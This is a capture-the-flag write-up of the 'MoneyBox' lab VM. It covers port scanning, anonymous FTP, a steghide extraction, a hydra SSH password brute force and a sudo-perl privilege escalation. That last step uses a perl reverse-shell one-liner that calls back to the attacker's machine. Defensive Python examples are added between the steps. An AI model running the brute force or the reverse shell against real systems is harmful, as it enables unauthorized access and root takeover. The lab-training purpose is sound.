
MoneyBox

0x00. Overview

Difficulty : Easy

Goal : 3 flags

A CTF-style boot2root VM. veryveryvery~ez

0x01. Host discovery

Since the VM sits on a host-only network, an ARP scan is enough to find it. In the output below, .1 is the gateway and .100 is the DHCP server, so .103 is the target's IP address.

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan 192.168.56.1/24
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.56.104
WARNING: host part of 192.168.56.1/24 is non-zero
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:59:03:27 PCS Systemtechnik GmbH
192.168.56.103 08:00:27:0f:86:5f PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.133 seconds (120.02 hosts/sec). 3 responded

0x02. Information gathering

With the IP address found, the next step is a full port scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- 192.168.56.103
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 02:02 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00052s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:0F:86:5F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.12 seconds

Ports 21, 22 and 80 are open. Next, grab banners to see which service and version each port is running.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.56.103
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 02:07 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00015s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:0F:86:5F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds

With the banner information in hand, the -sC option runs Nmap's default scripts against each port. Here the output shows that the FTP service on port 21 allows anonymous login.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -p21,22,80 192.168.56.103
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-26 02:09 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00045s latency).

PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.104
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh
| ssh-hostkey:
| 2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
| 256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_ 256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open http
|_http-title: MoneyBox
MAC Address: 08:00:27:0F:86:5F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.02 seconds

0x03. Anonymous FTP login

The FTP service was found to allow anonymous login, so log in.

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.56.103
Connected to 192.168.56.103.
220 (vsFTPd 3.0.3)
Name (192.168.56.103:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Try changing directory and listing files. Changing directory is not possible, and there is only a single jpg image; its name, trytofind, seems to be hinting at something.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
226 Directory send OK.
ftp> pwd
257 "/" is the current directory
ftp> cd /
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
226 Directory send OK.
ftp>

Download trytofind.jpg for analysis. Looking at the image itself, there is nothing useful in it! (Actually there is; see the next step :)

ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
226 Transfer complete.
1093656 bytes received in 0.05 secs (21.3356 MB/s)

0x04. Visiting the HTTP service

Port 80 was found earlier, so visit the HTTP service and check whether it offers anything usable.

It is only a static page and the source reveals nothing, so next, scan for directories.

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.56.103

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Oct 26 03:09:37 2021
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.103/ ----
==> DIRECTORY: http://192.168.56.103/blogs/
+ http://192.168.56.103/index.html (CODE:200|SIZE:621)
+ http://192.168.56.103/server-status (CODE:403|SIZE:279)

---- Entering directory: http://192.168.56.103/blogs/ ----
+ http://192.168.56.103/blogs/index.html (CODE:200|SIZE:353)

-----------------
END_TIME: Tue Oct 26 03:09:41 2021
DOWNLOADED: 9224 - FOUND: 3

A blogs directory was found; visit it. Its source reveals a secret directory; visit that too!

A key (3xtr4ctd4t4) turns up here; keep it for later.

0x05. Reading the information hidden in the image

At this point the test seems to have hit a bottleneck, but the hint we were given is "this is a very easy box, don't overthink it", so we go back to the image as the breakthrough point!

Use strings to look at the printable strings inside the image.

┌──(kali㉿kali)-[~]
└─$ strings trytofind.jpg | head -n 15
JFIF
, #&')*)
-0-(0%()(
((((((((((((((((((((((((((((((((((((((((((((((((((
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
p=*5$
\sH@
"PCv
N' g
.}F1@
@#u-
}h_n

This does not look like a normal image header, so use steghide to inspect the image; this is where the key found earlier (3xtr4ctd4t4) comes in.

┌──(kali㉿kali)-[~]
└─$ steghide info trytofind.jpg
"trytofind.jpg":
format: jpeg
capacity: 64.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "data.txt":
size: 136.0 Byte
encrypted: no
compressed: no
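As an added illustration that is not part of this writeup and not steghide's own code, the Python below walks a JPEG's marker segments and measures how much data follows the EOI marker. The JFIF string that strings printed comes from the APP0 segment that immediately follows SOI. Note what this check can and cannot see: steghide embeds its payload inside the DCT coefficients of the scan data, so a structural walk like this will not reveal a steghide payload, but it does catch the other common trick of appending a file after EOI, which image viewers silently ignore. The sample bytes are constructed in build_sample() and are not taken from trytofind.jpg.

```python
"""Walk the segment structure of a JPEG and report data appended after EOI.

Added example, not part of the MoneyBox writeup. The JPEG bytes used here
are constructed by build_sample(); they are a minimal, structurally valid
marker sequence, not a decodable picture.
"""
import struct

# Human-readable names for the markers this example expects to meet.
MARKER_NAMES = {0xC0: "SOF0", 0xC4: "DHT", 0xDA: "SOS", 0xDB: "DQT",
                0xE0: "APP0", 0xE1: "APP1", 0xFE: "COM"}


def walk_jpeg(data):
    """Return (segments, trailing_bytes).

    segments: list of (name, length) tuples in file order, where length is
    the segment length field (payload + 2). The entropy-coded scan that
    follows SOS has no length field, so it is skipped up to the EOI marker.
    trailing_bytes: bytes after EOI, which decoders ignore.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    segments = [("SOI", 0)]
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                       # EOI without any scan
            segments.append(("EOI", 0))
            return segments, len(data) - (pos + 2)
        if pos + 4 > len(data):
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segments.append((MARKER_NAMES.get(marker, f"FF{marker:02X}"), length))
        pos += 2 + length                        # jump over marker + payload
        if marker == 0xDA:
            # Inside the scan, 0xFF is byte-stuffed as FF00 and only RSTn
            # markers appear, so the first FFD9 is the real EOI.
            eoi = data.find(b"\xff\xd9", pos)
            if eoi == -1:
                raise ValueError("no EOI marker after the scan")
            segments.append(("EOI", 0))
            return segments, len(data) - (eoi + 2)
    raise ValueError("truncated JPEG: ran out of data before EOI")


def triage(data):
    """Summarise a JPEG: segment names, JFIF header present, appended bytes."""
    segments, trailing = walk_jpeg(data)
    jfif = data[2:4] == b"\xff\xe0" and data[6:11] == b"JFIF\x00"
    return {"segments": [name for name, _ in segments],
            "jfif": jfif, "trailing_bytes": trailing}


def build_sample(trailer=b""):
    """Construct a minimal JPEG marker sequence, optionally with appended data."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"      # 14-byte JFIF payload
    seg_app0 = b"\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
    dqt = bytes(65)                                             # placeholder table
    seg_dqt = b"\xff\xdb" + struct.pack(">H", len(dqt) + 2) + dqt
    sos_hdr = b"\x01\x01\x00\x00\x3f\x00"                       # one-component scan header
    seg_sos = b"\xff\xda" + struct.pack(">H", len(sos_hdr) + 2) + sos_hdr
    scan = b"\x12\x34\xff\x00\x56"                              # scan data with a stuffed FF00
    return b"\xff\xd8" + seg_app0 + seg_dqt + seg_sos + scan + b"\xff\xd9" + trailer


if __name__ == "__main__":
    print(triage(build_sample()))
    print(triage(build_sample(b"appended payload")))
```

Run against a real file with triage(open(path, "rb").read()); a non-zero trailing_bytes is worth a closer look, while a clean walk only rules out appended data, not coefficient-level steganography.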

The image contains a file named data.txt; extract it. According to the hint inside, the user renu has a weak password.

┌──(kali㉿kali)-[~]
└─$ steghide extract -sf trytofind.jpg
Enter passphrase:
wrote extracted data to "data.txt".

┌──(kali㉿kali)-[~]
└─$ cat data.txt
Hello..... renu

I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......


0x06. Brute-forcing renu

Following the hint, brute-force renu's password; it turns out to be 987654321.

┌──(kali㉿kali)-[~]
└─$ hydra -l renu -P ./rockyou.txt ssh://192.168.56.103
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-26 04:00:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103 login: renu password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-26 04:00:56
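From the defender's side, a password-guessing run like the one above leaves a dense burst of "Failed password" lines in sshd's log, typically followed by one "Accepted password" from the same source once a guess lands. The Python below is an added example, not part of the writeup, that runs a sliding-window count over such lines. The log lines are constructed to mimic Debian auth.log entries; the hostname, PIDs and ports are made up.

```python
"""Flag SSH password-guessing bursts in sshd log lines.

Added example, not part of the MoneyBox writeup. SAMPLE_LOG is constructed
to look like Debian auth.log output during a dictionary attack against
the renu account followed by a normal login from another host.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = [
    "Oct 26 04:00:36 MoneyBox sshd[1201]: Failed password for renu from 192.168.56.104 port 40012 ssh2",
    "Oct 26 04:00:37 MoneyBox sshd[1202]: Failed password for renu from 192.168.56.104 port 40014 ssh2",
    "Oct 26 04:00:37 MoneyBox sshd[1201]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.104  user=renu",
    "Oct 26 04:00:39 MoneyBox sshd[1204]: Failed password for renu from 192.168.56.104 port 40016 ssh2",
    "Oct 26 04:00:41 MoneyBox sshd[1206]: Failed password for renu from 192.168.56.104 port 40018 ssh2",
    "Oct 26 04:00:44 MoneyBox sshd[1208]: Failed password for renu from 192.168.56.104 port 40020 ssh2",
    "Oct 26 04:00:50 MoneyBox sshd[1210]: Failed password for renu from 192.168.56.104 port 40022 ssh2",
    "Oct 26 04:00:55 MoneyBox sshd[1230]: Accepted password for renu from 192.168.56.104 port 40044 ssh2",
    "Oct 26 04:10:00 MoneyBox sshd[1300]: Failed password for lily from 192.168.56.1 port 50000 ssh2",
    "Oct 26 04:10:05 MoneyBox sshd[1301]: Accepted password for lily from 192.168.56.1 port 50001 ssh2",
]

# Matches only password-authentication results; other sshd lines are ignored.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<status>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_line(line, year=2021):
    """Return a dict for a password-auth result line, or None for anything else.

    syslog timestamps carry no year, so the caller supplies one.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "status": m["status"], "user": m["user"], "ip": m["ip"]}


def find_bruteforce(lines, threshold=5, window_seconds=60):
    """Report source IPs with >= threshold failures inside a sliding window.

    Returns {ip: {"failures": peak failures seen in one window,
                  "success_after_burst": a login succeeded while the burst
                                         was still inside the window,
                  "users": sorted usernames that source tried}}.
    """
    recent = defaultdict(deque)    # ip -> failure timestamps still in the window
    attempted = defaultdict(set)   # ip -> usernames tried
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        q = recent[ip]
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()            # expire failures older than the window
        if ev["status"] == "Failed":
            q.append(ts)
            attempted[ip].add(ev["user"])
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "success_after_burst": False})
                a["failures"] = max(a["failures"], len(q))
        elif ip in alerts and q:
            # Success from a source whose failure burst is still in the window:
            # the guessing most likely landed on a valid password.
            alerts[ip]["success_after_burst"] = True
    return {ip: {**a, "users": sorted(attempted[ip])} for ip, a in alerts.items()}


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

The interesting signal is success_after_burst: a burst alone says someone is guessing, a burst followed by an accepted login from the same source says the guess worked and the account needs a password reset. The root cause in this box is the weak password; on a real host, key-only authentication or a lockout tool in front of sshd removes the attack surface rather than just detecting it.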

Log in over SSH, which gives the first flag.

┌──(kali㉿kali)-[~]
└─$ ssh renu@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
renu@192.168.56.103's password:
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ ls
ftp user1.txt
renu@MoneyBox:~$ cat user1.txt
Yes...!
You Got it User1 Flag

==> us3r1{F14g:0ku74tbd3777y4}


0x07. Switching to the lily user

After logging in as renu, check whether renu has sudo rights that could be used for privilege escalation; unfortunately not. The shell history, however, reveals some useful information.

renu@MoneyBox:~$ sudo -s
[sudo] password for renu:
renu is not in the sudoers file. This incident will be reported.
renu@MoneyBox:~$ history
1 cler
2 ls
3 ls -la
4 cd /home
5 ls
6 clear
7 cd
8 ls
9 ls -la
10 exit
11 clear
12 ls
13 ls -la
14 cd /home
15 ls
16 cd lily
17 ls
18 ls -la
19 clear
20 cd
21 clear
22 ssh-keygen -t rsa
23 clear
24 cd .ssh
25 ls
26 ssh-copy-id lily@192.168.43.80
27 clear
28 cd
29 cd -
30 ls -l
31 chmod 400 id_rsa
32 ls -l
33 ssh -i id_rsa lily@192.168.43.80
34 clear
35 ssh -i id_rsa lily@192.168.43.80
36 cd
37 clear
38 cd .ssh/
39 ls
40 ssh -i id_rsa lily@192.168.43.80
41 su lily
42 clear
43 cd
44 sudo apt install openssh
45 sudo apt update
46 sudo apt install openssh-server
47 sudo service ssh start
48 sudo service ssh status
49 clear
50 cd /etc/
51 ls
52 cd ssh
53 ls
54 nano ssh_config
55 ls
56 nano sshd_config
57 clear
58 cd
59 ls
60 ls -la
61 chsh bash
62 chsh
63 clear
64 su root
65 clear
66 sudo apt install openssh
67 su root
68 exit
69 ls
70 cat user1.txt
renu@MoneyBox:~$

From the history we can see that renu generated an SSH key pair, copied the public key into lily's .ssh directory, and then used the private key to log in as lily. This server also has a lily user, so is the lily in the history the lily on this server? The answer is yes. Logging in yields the second flag.

renu@MoneyBox:~/.ssh$ ssh -i id_rsa lily@192.168.56.103
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 24 06:32:41 2021 from 192.168.56.103
lily@MoneyBox:~$ whoami
lily
lily@MoneyBox:~$ id
uid=1000(lily) gid=1000(lily) groups=1000(lily),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
lily@MoneyBox:~$ ls
user2.txt
lily@MoneyBox:~$ cat user2.txt
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}

lily@MoneyBox:~$

0x08. Privilege escalation

By VulnHub convention, the third flag is bound to be under the root user. Checking the history shows that lily searched for SUID files but found none. However, lily does have sudo rights.

lily@MoneyBox:~$ history 
1 whoami
2 exit
3 sudo -l
4 clear
5 find / -type f -user lily -perm 4000
6 find / -type f -user lily -perm 4000 2>/dev/null
7 find / -type f -user root -perm 4000 2>/dev/null
8 exit
9 find / -type f -user root -perm 4000 2>/dev/null
10 find / -type f -user lily -perm 4000 2>/dev/null
11 find / -type f -user lily -perm 4000
12 clear
13 find / -type f -user lily -perm 4000 2>/dev/null
14 exit
15 find / -type f -user lily -perm 4000 2>/dev/null
16 find / -type f -root lily -perm 4000 2>/dev/null
17 sudo -l
18 clear
19 exit
20 sudo -l
21 clear
22 exit
23 cd
24 clear
25 su renu
26 clear
27 cd /usr/bin/
28 ls
29 ls ping
30 ls -l ping
31 chmod u+s ping
32 chmod -u+s ping
33 ls -l ping
34 sudo chmod -u+s ping
35 ls -l ping
36 sudo chmod u+r ping
37 sudo chmod u+w ping
38 ls -l ping
39 sudo chmod g-s ping
40 ls -l ping
41 apt update
42 sudo apt update
43 ls
44 ls -l whoami
45 sudo chmod 400 ping
46 sudo chmod u+x ping
47 ls -l ping
48 clear
49 cd
50 cd /etc/
51 nano sudoers
52 sudo nano sudoers
53 cd /usr/bin
54 ls nano
55 ls more
56 clear
57 cd /etc/
58 sudo nano sudoers
59 su root
60 ls
61 ls -la
62 clear
63 ls -la
64 nano user2.txt
65 ls
66 cat user2.txt
67 exit
68 ls
69 cat user2.txt
70 exit
71 whoami
72 id
73 ls
74 cat user2.txt
75 sudo -s
76 history
lily@MoneyBox:~$

Listing the commands lily may run with sudo reveals perl.

lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
(ALL : ALL) NOPASSWD: /usr/bin/perl
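The rule above is the whole privilege-escalation bug: a NOPASSWD sudo entry for an interpreter is equivalent to a root shell, because an interpreter executes whatever code it is handed. The Python below is an added example, not from the writeup, that parses sudo -l output and grades each rule; the list of shell-capable binaries is a starting point, not an exhaustive one. The sample text reuses the rule shown on the page plus one constructed low-risk rule for contrast.

```python
"""Audit `sudo -l` output for rules that amount to a root shell.

Added example, not part of the MoneyBox writeup. SAMPLE_SUDO_L reproduces
the rule seen on the box and adds one constructed service-restart rule.
"""
import re
from pathlib import PurePosixPath

# Binaries that run arbitrary code or offer a shell escape; sudo rights on
# any of these, with or without NOPASSWD, let the caller become the run-as
# user. Extend as needed; this set is illustrative.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "php", "node", "lua",   # interpreters
    "vi", "vim", "nano", "less", "more", "man",                              # editor/pager escapes
    "bash", "sh", "dash", "zsh", "find", "awk", "env",                       # shells and launchers
}

# "(runas) TAG: TAG: cmd1, cmd2" as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

SAMPLE_SUDO_L = """\
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
    (root) /usr/sbin/service apache2 restart
"""


def audit_sudo_l(text):
    """Return one finding per command in the rule section of `sudo -l` output."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = PurePosixPath(cmd.split()[0]).name
            if cmd == "ALL":
                risk, reason = "critical", "unrestricted sudo"
            elif binary in SHELL_CAPABLE:
                risk, reason = "high", f"{binary} can execute arbitrary code as the run-as user"
            else:
                risk, reason = "low", "specific command; review its arguments and the binary's escapes"
            findings.append({"runas": m["runas"].strip(), "nopasswd": nopasswd,
                             "command": cmd, "risk": risk, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{f['risk']:8} nopasswd={f['nopasswd']!s:5} {f['command']}  ({f['reason']})")
```

The remediation for a high finding is to remove the rule; if an administrative task genuinely needs perl, grant sudo on one fixed script with no arguments rather than on the interpreter itself, and keep a password requirement so a stolen session cannot escalate silently.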

Perl reverse shell

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 6666
listening on [any] 6666 ...
perl -e 'use Socket;$i="192.168.56.104";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

That returns a root shell, and with it the third flag.

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.103] 43008
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# ls
user2.txt
# pwd
/home/lily
# cd /root
# ls -l
total 0
# ls -la
total 28
drwx------ 3 root root 4096 Feb 26 2021 .
drwxr-xr-x 18 root root 4096 Feb 25 2021 ..
-rw------- 1 root root 2097 Feb 26 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Feb 25 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 228 Feb 26 2021 .root.txt
# cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
It's My First CTF Box

instagram : ____kirthik____

See You Back....

#
-------------The note is short but the feeling is long; see you next time-------------